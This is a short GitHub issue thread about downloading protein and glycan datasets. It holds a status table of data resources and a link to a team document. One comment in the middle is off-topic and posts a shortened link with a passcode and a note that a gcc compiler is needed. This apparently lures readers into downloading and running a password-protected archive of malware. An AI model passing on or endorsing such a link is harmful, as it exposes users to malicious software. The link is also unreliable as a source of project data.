### ISSUE TITLE
Data Downloads (Proteins)

### ISSUE THREAD

**Issue by ReneRanzinger** [glygener/glygen-issues#1729]
Download the glycan and protein datasets in preparation of pre-processing.

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by ubhuiyan** [comment]
| Resource | Downloaded by |Completed (Y/N)| Notes | Issue | 
| -------- | ------- | ------- | ------- |------- |
|Genomics England |Kate | Y | Looks good |N |
|Genome Alliance |Kate | Y | Looks good |N |
|MGI |Kate | Y | Looks good |N |
|Mondo |Kate | Y | Looks good |N |
|EBI | Kate | Y | missing gene co-ordinates  | #1746 |
|NCBI RefSeq | Kate| Y | No size change |N |
|Disease Ontology |Kate | Y |  | |
|Glycohydrolase (bovine) | Kate |  |  | |
|Glycosyltransferase (bovine) | Kate |  |  | |


[Proteoform and Protein Data Download Doc](https://gwu0.sharepoint.com/:w:/r/sites/GlyGenTeam-GRP/_layouts/15/doc2.aspx?sourcedoc=%7BE6511E4F-F88A-452F-AB40-DAE665A5E949%7D&file=Data%20Download%20-%20Proteoform.docx&action=default&mobileredirect=true)
